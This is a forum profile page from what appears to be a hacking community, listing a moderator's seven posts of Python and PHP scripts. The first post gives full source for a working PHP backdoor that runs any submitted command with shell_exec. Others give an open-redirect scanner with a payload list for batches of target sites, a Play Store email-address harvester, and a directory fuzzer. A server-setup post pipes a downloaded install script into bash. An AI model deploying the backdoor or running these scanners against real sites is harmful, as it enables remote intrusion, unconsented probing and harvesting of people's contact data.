Jump to content
×
×
  • Create New...

venomgrills

Moderator
  • Posts

    8
  • Joined

  • Last visited

  • Days Won

    4

venomgrills last won the day on November 13 2021

venomgrills had the most liked content!

3 Followers

About venomgrills

Recent Profile Visitors

775 profile views

venomgrills's Achievements

Apprentice

Apprentice (3/14)

  • One Month Later
  • Dedicated
  • First Post
  • Week One Done
  • Conversation Starter

Recent Badges

17

Reputation

  1. Hey Guys! Wassup! Hope you all are doing fine! So here Venom again! So today here I am going to share the code for small PHP shell which I have developed recently! <?php $uname = shell_exec("uname -a"); // GETTING CURRENT UNIX NAME USING SHELL_EXEC FUNCTION IN PHP echo "<div class='uname'><center> $uname </center></div>"; // PRINTING THE UNAME $cwd = getcwd(); // GETTING THE CURRENT WORKING DIRECTORY USING GETCWD FUNCTION IN PHP echo "<div class='uname'><center>Current working directory: ".$cwd."</center></div>"; // PRINTING THE CWD ?> // SIMPLE HTML CODE FOR TAKING INPUT AND SHOWING OUTPUT <html> <head> <title>Venom PHP Backdoor</title> <style> @import url('https://fonts.googleapis.com/css2?family=Shippori+Antique&family=Ubuntu&display=swap'); * { margin: 0; padding: 0; } body { background-color: black; color: #33FF3E; } .uname { font-size: 20px; padding-top: 20px; font-family: 'Shippori Antique', sans-serif; } #keyword { margin-top: 20px; font-size: 40px; border: 2px solid green; border-radius: 9px; } input { background-color: #272927; text-align: center; margin-bottom: 100px; } input::-webkit-input-placeholder { font-size: 20px; text-align: center; padding-bottom: 20px; color: green; } .output { color: green; font-family: 'Ubuntu', sans-serif; font-size: 20px; padding-left: 20px; } </style> </head> <body> <center> <form method="POST"> <input id="keyword" onfocus="this.value=''; this.style.color='#20ED20'" name="command" placeholder="Enter command here..."/> <!-- Taking command in post method with variable name "command" ---> </form> </center> </body> </html> <?php if ($_SERVER['REQUEST_METHOD'] == "POST"){ // IF the user enters and data and makes any post request then $cmd = $_POST['command']; // made a variable name "cmd" from our post request which carry our input as "command" $output = shell_exec($cmd); // Executing the user input with SHELL_EXEC Function! $description = preg_replace("/\r\n|\r|\n/", '<br/>', $output); // replacing the new line characters with <br> echo "<div class='output'>".$description."</div>"; // displaying the output! } ?> Hope you have learnt something new from this! Regards, VenomGrills Developing a custom PHP Backdoor - Backend-Development - Shell_Forum.mp4
  2. Hey Guys! Here I am back again! So guys today I am going to talk about hosting your site and managing all the backend stuff all in this one tutorial! All you need is a VPS (2 GB Ram recommended) with cent os installed! So guys first of all what all skills do a backend Full stack developer need?? It could be a LAMP (Linux Apache MySQL PHP) or LNMP (Linux Nginx MySQL PHP), In our case we are going with LAMP and will be discussing about complete server configuration one by one! I"ll be posting further posts on complete management of backend and will be posting tutorials on PHP and MySQL. So without wasting much time let's start! Many people who use VPS prefer having a panel for their support because it makes thing much easier and some prefer using ssh for managing all the things. So in our case we will first install a panel using ssh and then will be further discussing about configuring the server using both panel and ssh. We have multiple panels like cpanel whm , aapanel, centos web panel etc. So in our case we will go with the free panel i.e aapnel which is same as cpanel whm, centos web panel is also free but looks a bit complicated! So in our case we will be installing aapanel on our VPS. For installing aa panel we need a ssh connection of the vps server for ssh connection type -: [email protected] ~# ssh [email protected]_ip Then enter your password for ssh and after a successful login type these commands in your terminal [email protected] ~# yum update [email protected] ~# yum install wget -y [email protected] ~# wget -O install.sh http://www.aapanel.com/script/install_6.0_en.sh [email protected] ~# bash install.sh After that wait for sometime! After few minutes you will get a link with of your control panel with username and passsword. Open that link in browser and boom! You are done! I"ll post the next part on the same series soon! Warm Regards, Venomgrills
  3. Hey Guys! I am Venom! 🐍 Today I am going to share a simple python script for finding open redirections from the given site list! import requests # Requests library for making get requests to website import os # os library for checking if file exists or not! openRedirection = ["/http://example.com", "/%5cexample.com", "/%2f%2fexample.com", "/example.com/%2f%2e%2e", "/http:/example.com", "/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com", "/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com", "/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com", "/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com", "/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com", "/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com", "/.example.com", "///\;@example.com", "///example.com/", "///example.com", "///example.com/%2f..", "/////example.com/", "/////example.com"] # Payloads for checking open redirection file = input("[+] Enter the file path: ") # taking file as user input! if os.path.exists(file) is True: # checking if file exists print("[+] File Found: True!") # If file exists then print this line op = open(file, 'r') # now opening file in read mode read = op.readlines() # reading the content inside the file! and storing it in a variable named read which is a list print("[+] Total Sites: " + str(len(read))) # printing the total number of sites using len function for sites in read: # using for loop on the site lists (read) site = sites.replace("\n", "") # replacing the new line character for payloads in openRedirection: # using for loop on payload list (OpenRedirection) url = site + payloads # making final url = target site + payload try: # error handling ! Try this thing or if you got any error then put it in except loop! response = requests.get(url, allow_redirects=True) # making a get request to the final url with allowing the redirects history = response.history # using history method to check if the website got any other redirections or not if history == []: # if the history has no content (status code) then run this situation print("[+] " + url + " [Not Vulnerable]") # print not vulnerable else: # if the history is not empty then run this situation op = open("output.txt", 'a') # opening an output text file in append mode op.write(url + "\n") # writing the vulnerable url with new line character! print("[+] " + url + " [Vulnerable]") # The url is vulnerable! op.close() # closing the file and saving the content except: # if there is any error run this loop! pass # pass else: # if file not found! run this situation print("[+] File Not found! Please try again with correct file path!") Thanks for reading the post!
  4. Hey Guys! I am Venom! I hope you all are fine! Today I am sharing the web crawler script written in python ! So let's begin! import requests # using requests library for getting the source code from site. import re # using re module for getting a tags from urllib.parse import urljoin # urlparse to parse the url from bs4 import BeautifulSoup # using bs4 to parse code using html parser urls = [] # to store the urls used target_links = [] url = [] target = input("[+] Enter the url: ") # taking target url as user input def extract(tar): # making a function extract with a value tar try: # try and except loop in case we got some status or http error response = requests.get(target) # getting the url content using get requests soup = BeautifulSoup(response.content, 'html.parser') # parsing the content return re.findall('(?:href=")(.*?)"', str(soup)) # find urls using the regex pattern except: pass # if any error occurs then just pass the data! def crawl(path): # making another function crawl which takes an argument links = extract(path) # now the function extract with get all the links from the argument given which is target in our case for link in links: # using for loop to format the urls and crawl them again one by one url = urljoin(path, link) # if url is not complete then joining the url with target if "#" in url: # if else loop url = url.split("#")[0] # if there is a # in url then just split the url and print the first path if link in url and url not in target_links: # if the link is in url list and url is not in the target list then target_links.append(url) # append the url to target link urls.append(target_links) print("[+] " + url) # printing the url which we have found! crawl(url) # now again running the crawl loop on the url! crawl(target) # running the crawl function with target url as argument!
  5. Hey Guys! I am Venom! Today I am going to share some basic methods and functions of requests library ! If you want to know more about the same please do comment and lemme know! 🙂 import requests # for importing the library url = "https://forum.shellcrew.org" headers = {"host": "forum.shellcrew.org", "origin": "shellcrew.org", "referer": "venomgrills.com", "Cookies": "somerandomcookies", "Accept": "application/json", "Content-Type": "application/json"} data = {"username": "admin", "password": "admin"} auth = {"user": "venom", "password": "fuck0ff"} response = requests.get(url) # making a get requests url (You can use any url like https://venomgrills.com) response = requests.get(url, auth=auth) response = requests.get(url, headers=headers) # make a get requests with headers response = requests.get(url, headers=headers, allow_redirects=True) # make a get requests with redirections response = requests.post(url, headers=headers, data=data) # Making a post based requests with data and headers response = requests.put(url, headers=headers, data=data) # Making a put requests with data and headers response = requests.get(url, timeout=0.5) # Making a get requests with timeout (time is in seconds) statusCode = response.status_code # for getting status code of any requests header = response.headers # for getting headers of any response cookies = response.cookies # for getting cookies of any response history = response.history # for getting history of any response encoding = response.encoding # for getting encoding of any response content = response.content # for getting content of any response this includes html tags, tabs etc. # Errors and exceptions in requests library try: response = requests.get(url) except requests.exceptions.ConnectionError as e: print("Connection error") # if website is down or unavilable then there is a connection error try: response = requests.get(url) except requests.exceptions.SSLError as e: print("The website has an invalid or expired ssl certificate!") try: response = requests.get(url) except requests.exceptions.InvalidHeader as e: print("Invalid header given (*_*)") # If you want more detailed info about requests library please do comment down for the second part!! :)
  6. Hello Freinds I m Venom (Gaurav) founder of Venomgrills and a Mod at Shell_Crew. So Let's look at a cool python script developed by me hope you guys enjoy and will learn from it so let's go. # Importing libraries import requests # requests library to making a get request for the webpage from bs4 import BeautifulSoup # to parse the html and read the content from html attributes and tags import re # regex to check email if any in the parsed data emailList = [] # making a list to add emails which we get from site x = 0 # an integer variable x with value 0.This will help us to index the content of the emailist emailRegex = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])""" # this is the regular expression for email format query = input("Enter your query: ") # taking any word as input like food apps or gaming apps url = "https://play.google.com/store/search?q=" + query +"&c=apps" # url for searching the apps as per are query # this us the scrap part where we will scrape the apps link for above url response = requests.get(url).content # making a get request to get the source code of website soup = BeautifulSoup(response, 'html.parser') # using beautiful soup with html parser to parse the content of the response variable for links in soup.findAll("a", class_="JC71ub"😞 # making a for loop which will grab the content from a tag with class "JC71UB" attribute (This is the tag where all the app links are given) link = links.get("href") # grabbing the link from href attribute finalLink = "https://play.google.com" + link # final link = initial playstore link + app link from above href attribute response = requests.get(finalLink).content # making a get request to fetch the content inside the webpage soup = BeautifulSoup(response, 'html.parser') # again parsing the html content using html parser for emails in re.finditer(emailRegex, str(soup)): # using re library to find the email pattern from the source of web page email = emails.group() # converting the emails output in a string emailList.append(email) # if email exists then adding it to the emailist given in the line 6 print(emailList[x]) # now printing the value of emails from the emaillist with x as indexing output = open("emails.txt", 'a') # opening a text file with name emails.txt in append mode to add the code output.write(emailList[x]) # write emails to the text file output.close() # closing the output file to save the output x += 3 # here we are adding three as we are indexing the list we are getting an email 3 times in webpage in order to avoid multiple prints we are skipping three emails everytime to avoid duplicates playstore_python.mp4
  7. Hii guys I m Venom!. So today we will see a short python3 script for a web-fuzzer. I hope u will learn something new out of it. So let's roll. # importing libraries import requests # for making request to website import os # for checking wordlist path url = input('Enter the url: ') # taking url as user input wordlist = input('Enter the wordlist path: ') # taking wordlist as user input # checking if wordlist exists or not if os.path.exists(wordlist) is False: # if wordlist does not exists then print that wordlist not found print("Wordlist not found! Please try again!") else: # if wordlist do exists then run this thing print("Wordlist Found: True!") op = open(wordlist, 'r') # opening the wordlist file read = op.readlines() # reading the content inside the file for path in read: # we are using a for loop to grab each and everyline finalurl = url + "/" + path # apending the which is targeturl + path response = requests.get(finalurl) # making a get request to get the status code of the website if response.status_code == 200 or response.status_code == 403: # checking if status is 200 or 403 print(finalurl + " [" + str(response.status_code) + "]") # if status code is 200 or 403 print the finalurl else: # else pass the response pass fuzzer_2-Veed.mp4